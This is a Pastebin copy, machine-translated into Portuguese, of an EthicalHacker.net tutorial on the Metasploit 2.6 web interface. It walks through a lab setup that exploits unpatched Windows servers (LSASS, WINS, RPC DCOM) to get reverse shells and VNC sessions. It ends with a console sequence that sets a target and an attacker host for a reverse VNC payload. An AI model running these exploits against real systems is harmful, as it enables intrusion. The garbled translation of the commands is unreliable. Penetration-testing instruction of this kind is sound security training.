Advertisement
leaksbrasil

Metasploit v2.6 Interface Web

May 9th, 2012
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.86 KB | None | 0 0
  1. Por Hashin, CISSP, CPTS, CEH Em um tutorial anterior por outro colunista EH-Net, Justin Peltier, que mostrou que a interface de linha de comando para Metasploit. Desta vez, Chris Gates leva você através do processo de automatizar seus testes de penetração com o interface web fornecido com o Metasploit Framework. Este abrange v2.6, mas procurar um nos próximos meses em v3. Como sempre, a interface web, como em qualquer GUI, oferece facilidade de uso. Claro que, com que a facilidade de utilização é menos flexibilidade. Chris leva você em uma extensa turnê de uma adição útil para esta ferramenta poderosa. Atenção: Com ferramentas como estas, nós não toleramos sua utilização para qualquer coisa, mas redes de teste para o qual você tem a autoridade e de aplicação de medidas defensivas. Divirta-se! Índice analítico - Introdução - Instalação para Windows - Instalação para * NIX - Configuração do Sistema de Teste e Metas na Rede - Preparando-se e iniciar a interface MSFWeb - Usando a interface web Metasploit Framework - Escolher um Exploit, Payload, Target e - Verificação e Lançamento do Exploit - Coisas que eu aprendi ao longo do Caminho - Mudando o tema do MSF Web Interface A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  2. Página 2
  3. - Referências - Sobre o autor - Apêndice A: Explicações Payload Introdução O Metasploit Framework é uma plataforma open-source avançada para desenvolver, testar e usar o código de exploração. É uma poderosa ferramenta para testes de penetração, exploração, desenvolvimento e pesquisa de vulnerabilidades. Desde o Metasploit Framework v2.0 Guia do Curso Crash: "O Metasploit Framework é um ambiente completo para a escrita, teste e usando o código de exploração. Este ambiente fornece uma plataforma sólida para testes de penetração, desenvolvimento shellcode, e pesquisa de vulnerabilidades. A maioria do Quadro é composto de código orientado a objetos Perl, com componentes opcionais escritos em C, assembler, e Python. " E um pouco mais a partir do site: http://www.metasploit.com/projects/Framework/index.html "O Metasploit Framework é uma avançada plataforma open-source de desenvolvimento exploit. A versão 2.6 inclui três interfaces de usuário, exploits 148 e 75 cargas úteis. O quadro será executado em qualquer sistema operacional moderno, que tem um trabalhando interpretador Perl. O instalador do Windows inclui uma versão reduzida do ambiente Cygwin. " Instalação para Windows É muito simples, fazer o download do http://www.metasploit.com/tools/framework-2.6.exe site e dê um duplo clique. Ele instala tudo que você precisa. Após a instalação, em sua seção de programas, você deve ter algo parecido com este: Figura 1. MSF na pasta Windows Programas Você também deve ter o manual Guia do Usuário, o seu Cygshell, MSFConsole, MSFUpdate, MSFWeb, Uninstall, e Atalhos do site. Para este tutorial vamos nos concentrar no console MSFWeb. Vamos jogar com o MSFConsole em outro tutorial ou você pode ler tutorial Justin mencionado acima, ou olhar para securityfocus.com, porque eles fizeram um grande tutorial usando principalmente o MSFconsole. Uma vez que este é um tutorial básico hacking, nós vamos tocar com a interface MSFWeb, uma vez que você não pode ficar muito mais fácil do que clicar em hiperlinks ... Instalação para * NIX Baixe o arquivo tar.gz do site: http://www.metasploit.com/tools/framework-2.6.tar.gz. Depois de baixar o A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  4. Página 3
  5. arquivo, descompacte o arquivo tar, mude o diretório para o diretório criado e executar a interface do usuário preferencial. Nós fortemente Recomendamos que você compilar e instalar o Term :: ReadLine :: Gnu módulo Perl encontrado no "extras" subdiretório. Este pacote permite o suporte guia-conclusão extensiva na interface msfconsole; msfconsole é o preferido para a interface do usuário o uso diário. Aqui está como fazê-lo: # Cd extras # Tar-zxf Termo-ReadLine-Gnu-1.14.tar.gz # Cd Termo-ReadLine-GNU-1,14 # && Perl Makefile.PL make && make install # Cd .. && Rm-rf-Term ReadLine-GNU-1.14 Se o suporte SSL é desejada, você deve instalar o módulo Perl Net :: SSLeay bem, isso também pode ser encontrada no "extras" subdiretório. Aqui está como fazê-lo: # Cd extras # Tar-zxf Net_SSLeay.pm 1.23.tar.gz- # Cd-Net_SSLeay.pm 1,23 # && Perl Makefile.PL make && make install # Cd .. && Rm-rf-Net_SSLeay.pm 1,23 Instalação de teste do sistema e Metas na Rede Para este tutorial simples eu usei um totalmente atualizado Windows XP Professional laptop com VMware Workstation versão 4.0.1 construir 5289 e uma instalação padrão do Windows 2000 Advanced Server sem patches e sem correção do Windows 2003 Servidor na rede. Uma vez que estamos aprendendo aqui, vamos começar com um sistema aberto que forma sabemos que o IIS, RPC Hacks DCOM, e WINS deve trabalhar e depois passar para algumas outras façanhas em sistemas operacionais diferentes. Preparando-se e iniciar a interface MSFWeb A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  6. Página 4
  7. Primeiro, você precisa desligar o firewall pessoal, porque você terá um tempo difícil cavar um back shell através do que bad boy. Figura 2. Desligue seus firewalls pessoais A partir daí, iniciar a Interface Web Metasploit Framework. Figura 3. Seleção MSFWeb de seus programas Depois que você deve obter um prompt de comando dizendo o que interface local do servidor MSFWeb está sendo executado. Figura 4. MSF Interface Web mostrando o IP ea porta está escutando Assim, a ferramenta dandy acessível nos diz que começou uma interface Web em 127.0.0.1:55555. Você pode alterar o endereço IP ouvir se você quiser. Antes de saltar em que devemos ler a ressalva pouco da documentação MSF: A interface msfweb é um servidor web stand-alone que permite aproveitar o poder do quadro através de um navegador. Esta interface ainda é primitivo, mas pode útil para demonstrações ao vivo e em testes de penetração baseada em equipes ambiente. A partir da versão 2.3, msfweb fornece um shell web rápido multi-usuário. Este sistema permite que você compartilhe seu ativo sessões com usuários msfweb outros. A consola de concha (e no resto do msfweb) foram testados com o Firefox 1,0, Internet Explorer 6.0, e os navegadores Safari / Konqueror. A interface msfweb fornece quase nenhuma segurança alguma, qualquer um que pode se conectar ao serviço msfweb poderia potencialmente ganhar acesso ao sistema subjacente. A configuração padrão é para ouvir no endereço loopback só, este pode ser alterado usando-uma opção para especificar o endereço IP local. Se você gostaria de abrir o servidor até todo o rede, passar 0.0.0.0 para a opção-a de msfweb. Assim como a interface de linha de comando, o ambiente salvo é carregado A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  8. Página 5
  9. na inicialização e pode afetar as configurações do módulo. Nós não recomendamos que a interface msfweb ser utilizado na produção ambientes ou expostos a redes não confiáveis. Usando a interface web Metasploit Framework Este é basicamente o que vamos fazer: 1) Inicie o servidor web (MSF A Interface Web) 2) Abra seu navegador favorito para http://127.0.0.1:55555 3) Selecione sua exploração a partir da lista disponível 4) Selecione o valor de destino apropriado 5) Selecione o payload apropriado 6) Especifique todas as opções necessárias e escolha o alvo correto 7) Clique no botão "Check--" para verificar a vulnerabilidade 8) Clique em "-Exploit-" para realmente explorar o alvo 9) Aguarde até que a exploração completa, clique no link para a sessão Nós já fizemos # 1, por isso agora vamos passar para # 2 e acionar o navegador web. Figura 5. MSF Interface Web Start-up A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  10. Página 6
  11. Agora você pode facilmente filtrar os módulos baseados em OS: Figura 6. MSF Web Interface Filtrar por OS Ou você pode filtrar pela arquitetura Figura 7. MSF Web Interface Filtrar por Arquitetura Ou você pode filtrar por aplicação. Figura 8. MSF Web Interface Filtrar por aplicação Escolher um Exploit, Payload, Target e Ok, agora sobre a # 3, a seleção de um exploit. Para escolher um módulo de exploração, basta clicar em um na interface web. Figura 9. MSF Interface Web selecionando o exploit LSASS Quando você clicar no módulo de exploração você tem uma página inicial explicando o exploit e dando-lhe informações adicionais. Nota: Se você quiser ler sobre as façanhas diferentes, você deve usar a informação no site. Isto irá carregar muito mais rápido do que clicar sobre eles na interface web. O link é: http://www.metasploit.com/projects/Framework/exploits.html Figura 10. MSF Web Interface LSASS exploit, a descrição e seleção de alvos Você também seleccionar o seu destino (passo 4) a partir desta página. Para esta façanha, vamos selecionar 0 para automático. Depois de clicar em seu alvo você ir para a seleção de carga útil (passo 5) página. A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  12. Página 7
  13. Figura 11. MSF Web Interface os LSASS explorar seleção de carga Nota: Se você quiser saber mais sobre as cargas diferentes, clique no link cargas no topo da página. Ela levará você a uma lista de todas as cargas úteis. Você pode clicar sobre as cargas diferentes e ler sobre eles, mas a informação é limitado. Você também pode verificar o Apêndice A, que abrange algumas das cargas em um pouco mais detalhadamente. O metasploit site também está lentamente preencher páginas de informações sobre as cargas. Vamos clicar no win32reverse que uma pá de volta shell para usar na máquina comprometida. Uma vez que clicar em que, somos apresentados com a página para especificar todas as opções necessárias e escolha o alvo correto (passo 6). Figura 12. MSF Web Interface as opções de exploração LSASS e identificação de alvos Tempo para uma outra ressalva: A carga útil é o código real que será executado no sistema de destino após uma tentativa de exploração bem-sucedida. Use a Web MSF Interface para listar todos os payloads compatíveis com a exploração atual. Se você está atrás de um firewall, você pode querer usar um dilema desembolsar carga. Se o seu alvo está atrás de um e você não está, você usaria uma carga reverso conexão. Uma vez que você clicar sobre o payload que você quer, o MSF Interface Web irá exibir todas as opções de carga disponíveis. A maioria das cargas ter pelo menos uma opção necessária. Opções avançadas são fornecidas por um punhado de opções de carga, estes serão estabelecidas em parte inferior da página de opções. Por favor tenha em mente que você terá permissão para selecionar qualquer carga compatível com a explorar, mesmo que não é compatível com o seu alvo selecionado. Por exemplo, se você selecionar um alvo Linux, ainda escolher uma carga BSD, você não deve esperar o exploit para o trabalho. Ok, tem tudo isso? Basicamente, você precisa usar o seu cérebro um pouco, mesmo com todo o trabalho duro a ser feito com a MSF. Nós já Nmap-ed nossa meta e saber que o endereço IP é 192.168.0.102. Vamos acrescentar que qualquer outro opções para a página e, em seguida, verificar o exploit (etapa 7). Figura 13. MSF Web Interface das opções LSASS IP de destino e entrou Verificação e Lançamento do Exploit Vamos verificar o computador remoto e ver se ele está vulnerável. Nem todos os exploits têm controlos, se você receber uma nota de volta dizendo que "nenhuma verificação para este módulo foi implementado" não pirar significa apenas que ninguém tem escrito um cheque para ele, apenas A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  14. Página 8
  15. avançar com o seu teste exploit. Figura 14. MSF Web Interface do cheque vulnerabilidade LSASS Vamos em frente e lançar o exploit (passo # 8) agora, pois não há nenhuma verificação. A maioria dos exploits mais recentes não têm cheques. Figura 15. MSF Web Interface do LSASS executar o exploit Ele diz que trabalhou, agora você clicar no link da sessão 1 (etapa # 9) e você deve começar sua página sessão. A partir do webpage sessão você pode entrar em comandos do Windows na caixa de texto na parte inferior da página. Figura 16. MSF Web Interface do LSASS win32_reverse shell Corri um IPCONFIG apenas para me certificar de que estava no caixa. Neste ponto você pode digitar comandos na barra de comando no página e navegar ao redor da caixa. Figura 17. MSF Web Interface a saída ipconfig LSASS de shell Ok, vamos tentar outra façanha contra a caixa do Windows Server 2000. Eu corri um scan do Nmap (você vai ter que confiar em mim) e tinha 42 porta abrir. Eu queria verificar as novas vitórias explorar contra a caixa. Então, eu escolhi as WINS explorar a partir da exploração lista, a única opção para alvos foi o Windows 2000, assim que eu escolhi isso também. Para a carga Eu tentei uma win32_reverse_vncinject. Esta carga é suposto pá de volta uma parte traseira do console VNC para o atacante. Figura 18. MSF Web Interface WINS explorar com win32_reverse_vnvinject A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  16. Página 9
  17. Foi um sucesso e me mandou de volta um console VNC. Figura 19. MSF Web Interface WINS explorar com VNC consola Eu também queria ver se eu vi o shell cortesia no computador Server 2000. Foi lá e como eu digitei as coisas na minha consolá-la apareceu na casca computadores remotos também. Figura 20. MSF Web Interface WINS explorar shell metasploit na máquina hackeada Por último eu queria ver se eu poderia ver minha conexão com o computador remoto a partir do computador remoto, então eu corri um netstat - uma só para verificar. Você pode ver a minha conexão em na porta 42 (servidor de nomes) e depois de volta para mim em 1040. Figura 21. MSF Web Interface WINS explorar netstat-a conexão mostrando em em 42 e para fora em 1040 Eu também corri o DCOM RPC explorar contra o controlador de domínio Windows 2003 em minha rede de teste. Figura 22. MSF Web Interface RPC DCOM contra o Windows Server 2003 Figura 23. MSF Web Interface VNC consola a partir do Windows Server 2003 Mudar Tema do MSF Web Interface Mudando o tema da interface web. A interface também vem na cor preta. Para alterar o tema vá para C: \ Program Files \ Metasploit Framework \ home \ quadro ou onde você instalou o MSF. Agora abra o arquivo msweb com um editor de texto (Bloco de notas ou wordpad) e altere o valor tema: #! / Usr / bin / perl # # # # # # # # # # # # # # # # # A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  18. Página 10
  19. # Nome: msfweb # Autor: HD Moore <hdm [at] metasploit.com> # Version: $ Revision: $ 1,106 # Descrição: interface Web para o Quadro Exploit Metasploit Licença #: # # Este arquivo é parte do quadro Exploit Metasploit # E está sujeita às mesmas licenças e direitos de autor como # O resto do pacote. # # # --- Snip # Configuração padrão ... my% config = ( "Bindaddr '=> '127 .0.0.1', "Bindport '=> 55555, "LogFile '=>' - ', "LogLevel '=> 0, 'Reload' => 0, 'Tema' => 'gblack', "ThemeDir '=>" $ RealBin / data / msfweb / themes ", "IconDir '=>" $ RealBin / data / msfweb / icons ", "CacheDir '=> $ ui-> _DotMsfDir. "/ Msfweb", 'Debilitada' => 0, ); Os MSF temas da interface da Web são armazenados em: C: \ Arquivos de programas \ Metasploit Framework \ home \ Framework \ data \ \ msfweb temas A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  20. Página 11
  21. Então, se você quiser, pode projetar você próprio tema você pode. Basta adicionar a / alterar o arquivo CSS na pasta para atender seus desejos. Depois de alterar o valor de tema, neste caso, para usar o tema preto, que deve ser semelhante a abaixo: Figura 24. MSF Interface Web com tema preto Coisas que eu aprendi ao longo do Caminho Aqui estão algumas coisas que eu aprendi ao longo do caminho mexer com a interface MSFWeb. Primeiro, você não precisa criar o seu próprio netcat concha para ouvir o shell voltar. Em segundo lugar, não parece importar a porta que você colocar na sua opção para LPORT você terá alguns de volta porta aleatória (v2.0). Terceiro, se você estiver usando o VMware, certifique-se pingar o alvo e cabe e execução e verificar os endereços IP. Quarto, a MSF Web Interface foi muito intensivo de CPU no meu laptop e estava causando as coisas a correr muito devagar (ele realmente diz isso na documentação. Se as coisas não estão funcionando verifique se o seu CPU não é maxed para fora de perl.exe. Por último, ter alguma paciência e se você souber a caixa deve ser vulnerável a tentar teste de vulnerabilidade novamente ou apenas lançar o exploit de qualquer maneira. Se ela falhar, você só precisa reiniciar o VM porque algo se desligou no meio do caminho, especialmente se você receber um "exploit em andamento erro" a partir da interface MSFWeb ou se ele expira. Referências O Metasploit Homepage: http://www.metasploit.com/index.html & A estrutura da página FAQ: http://www.metasploit.com/projects/Framework/documentation.html O Hacking Exposed Windows 2000 livro As pessoas grandes em http://www.learnsecurityonline.com/ A cafeína, um poder pequeno cérebro, e um monte de paciência http://www.ethicalhacker.net/~~V Sobre o Autor Chris Gates, CISSP, CPTS, CEH é o gerente de operações para http://www.LearnSecurityOnline.com. Seu computador interesses de segurança estão em Windows e Web Application Security. Ele também serve de mentor do estudante e desenvolvedor do curso A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  22. Página 12
  23. para LSO. Sinta-se livre para e-mail comentários e sugestões sobre o papel de Chris [at] learnsecurityonline [dot] com. Apêndice A: Explicações Payload Apêndice A tomada de MSF Crash Course v2.2 Cargas InlineEgg Python A biblioteca InlineEgg é uma classe Python para gerar dinamicamente programas em linguagem de montagem pequenos. O mais uso comum desta biblioteca é para criar rapidamente cargas de exploração avançados. Esta biblioteca foi desenvolvida por Gera para uso com produto de base ST de Impacto. Núcleo lançou esta biblioteca para o público sob uma licença não-comercial. O Metasploit Framework suporta cargas InlineEgg através da interface do módulo ExternalPayload, o que permite suporte transparente, se a linguagem de script Python está instalado. Para ativar as cargas InlineEgg, o EnablePython variável de ambiente deve ser definido como valor diferente de zero. Esta mudança foi feita a versão 2.2 para acelerar a recarga do módulo processo. Esta versão inclui exemplos InlineEgg para Linux, BSD e Windows. Os exemplos são Linux linx86_reverse_ie, linux86_bind_ie, e linux86_reverse_xor. Estas cargas podem ser seleccionados e utilizados na mesma maneira como qualquer carga outro. O conteúdo de carga útil são gerados dinamicamente pelos scripts Python no cargas / externo subdiretório. As cargas BSD funcionar quase exatamente o mesmo que suas contrapartes Linux. O Windows InlineEgg exemplo é nomeado win32_reverse_stg_ie e funciona de uma forma ligeiramente diferente. Esta carga tem uma opção chamada IEGG, esta opção especifica o caminho para o script Python InlineEgg que contém a carga final. Esta é uma carga encenado, o primeiro estágio é um padrão reverso conectar, a segunda etapa envia o endereço do GetProcAddress e LoadLibraryA pela conexão, ea terceira fase é gerado localmente e enviados através da rede. Um exemplo InlineEgg script é incluído nas cargas externas / subdiretório, chamado 'win32_stg_winexec.py'. Para mais informações sobre InlineEgg, consulte o site Gera na Internet, localizado em: http://community.corest.com/gera/ProgrammingPearls/InlineEgg.html Injeção ELF impureza Impureza foi um conceito desenvolvido por Alexander Cuttergo que descreveu um método de carregamento e execução de um novo ELF executável na memória. Esta técnica permite cargas arbitrariamente complexas a serem escritos no padrão C, o único requisito é uma carga de carregador especial. O quadro inclui um carregador de Linux para executáveis ​​de impureza, a carga é chamado linx86_reverse_impurity e requer que a opção PEXEC a ser definido para o caminho do executável. Impureza executáveis ​​deve ser compilado de forma específica, consulte a documentação no src / shellcode / linux / impureza subdiretório para obter mais informações sobre este processo. O incluído "shelldemo" aplicação no subdiretório de dados permite listar, acessar, ler, escrever e arquivos abertos no processo de exploração. O post lista original expedição é arquivado online em: http://archives.neohapsis.com/archives/vuln-dev/2003-q4/0006.html A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  24. Página 13
  25. Proxies encadeável O quadro inclui suporte transparente para proxies TCP, esta versão tem rotinas manipulador para HTTP CONNECT e SOCKSv4 servidores. Para usar um proxy com um exploit dado, a variável de ambiente Proxies precisa ser definido. O valor desta variável é uma lista separada por vírgulas de servidores proxy, onde cada servidor está no tipo de formato: host: port. O tipo valores são 'http' para HTTP CONNECT e 'socks4' para SOCKS v4. A cadeia de proxy pode ser de qualquer comprimento; mostra teste que o sistema estava estável, com mais de 500 SOCKS e proxies HTTP configurados de forma aleatória em uma cadeia. O proxy máscaras de cadeia apenas o pedido de exploração, a conexão automática para a carga não é transmitida através da cadeia de proxy em este tempo. Cargas Win32 UploadExec Embora os sistemas Unix, normalmente, incluir todas as ferramentas que você precisa postexploitation, os sistemas Windows são notoriamente falta de uma decente kit de ferramentas de linha de comando. As cargas UploadExec incluídas nesta versão permite que você simultaneamente explorar um sistema Windows, fazer upload de sua ferramenta favorita, e executá-lo, por toda a conexão de soquete de carga útil. Quando combinado com um rootkit de extração ou intérprete de linguagem de scripting (perl.exe!), este pode ser um recurso muito poderoso. Injeção Win32 Cargas DLL A versão 2.2 do Framework inclui uma carga encenado que é capaz de injetar uma DLL personalizada na memória em combinação com qualquer exploit Win32. Esta carga não resultará em quaisquer arquivos que estão sendo gravados no disco, a DLL é carregada diretamente na memória e é iniciado como um novo segmento no processo de exploração. Esta carga foi desenvolvido por Jarkko Turkulainen e Matt Miller e é um dos mais poderosos pós-exploração técnicas desenvolvidas até à data. Para criar um DLL que pode ser usado com esta carga, utilizar o ambiente de desenvolvimento de escolha e construir um DLL Win32 padrão. Este DLL deve exportar uma função chamada Init que tem um único argumento, um valor inteiro que contém o soquete descritor da ligação de carga útil. A função de inicialização para torna-se ponto de entrada para o novo segmento no processo de exploração. Quando o processamento está completo, ele deve retornar e permitir que o carregador de topo para sair do processo de acordo com a EXITFUNC variável de ambiente. Se você gostaria de escrever suas próprias cargas DLL, consulte o diretório src/shellcode/win32/dllinject no quadro. VNC Server DLL Injection Uma das primeiras cargas DLL injeção desenvolvidos era de um servidor VNC personalizado. Este servidor foi escrito por Matt Miller e com base no código fonte do RealVNC. Modificações adicionais foram feitas para permitir que o servidor para trabalhar com explorada, não-interativas dos serviços de rede. Esta carga permite que você imediatamente acessar o desktop de um sistema de exploração exploit usando quase qualquer Win32. A DLL é carregada para o processo remoto usando qualquer um dos sistemas encenadas carregadeira, iniciou-se como um novo segmento no processo de exploração, ea escuta as solicitações do cliente de VNC no mesmo soquete usado para carregar a DLL. O quadro simplesmente escuta em um socket local para um cliente VNC e dados procuradores em todo o payload conexão com o servidor. A Rede Hacker Ético http://www.ethicalhacker.net Fornecido por Joomla! Produzido em: 09 de maio de 2012, 13:30
  26. Página 14
  27. O servidor VNC irá tentar obter acesso completo ao desktop interativo atual. Se a primeira tentativa falhar, ele irá chamar RevertToSelf () e depois tentar novamente a tentativa. Se ainda assim não consegue obter o pleno acesso a esta área de trabalho, ele vai cair de volta a uma leitura só modo. Em modo de somente leitura, o usuário quadro pode visualizar o conteúdo do desktop, mas não interagir com ele. Se estiver cheio acesso foi obtido, o servidor VNC vai gerar um shell de comando na área de trabalho com os privilégios dos explorados serviço. Isso é útil em situações onde um usuário sem privilégios é na área de trabalho interativa, mas o serviço é explorado sendo executado com privilégios de sistema. Se não houver nenhum usuário interativo logado no sistema ou a tela tiver sido bloqueado, o comando shell pode ser usado para iniciar o explorer.exe de qualquer maneira. Isso pode resultar em alguns usuários muito confusa quando o tela de logon também tem um menu de início. Se o desktop interativo é alterado, seja através de alguém fazer o login no sistema ou bloquear a tela, o servidor VNC irá desconectar o cliente. Versões futuras podem tentar seguir um ambiente de trabalho mudar. Para usar as cargas de injeção de VNC, especifique o caminho completo para o servidor VNC como o valor da opção de DLL. O VNC servidor pode ser encontrada nos dados subdiretório da instalação Quadro e é chamado 'vncdll.dll'. A fonte código da DLL pode ser encontrada no directório src/shellcode/win32/dllinject/vncinject da instalação quadro. msf> uso lsass_ms04_011 msf lsass_ms04_011> set rhost some.vuln.host Rhost - some.vuln.host> msf lsass_ms04_011> PAYLOAD conjunto win32_reverse_vncinject CARGA -> win32_reverse_vncinject msf lsass_ms04_011 (win32_reverse_vncinject)> set LHOST your.own.ip LHOST -> your.own.ip msf lsass_ms04_011 (win32_reverse_vncinject)> set LPORT 4321 LPORT -> 4321 msf lsass_ms04_011 (win32_reverse_vncinject)> exploit Se o "vncviewer" aplicativo está em seu caminho ea opção AUTOVNC foi definido (é o padrão), o quadro será abrir automaticamente o desktop VNC. Se você gostaria de conectar-se à área de trabalho manualmente, defina AUTOVNC 0, em seguida, usar vncviewer para conectar a 127.0.0.1 na porta 5900
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement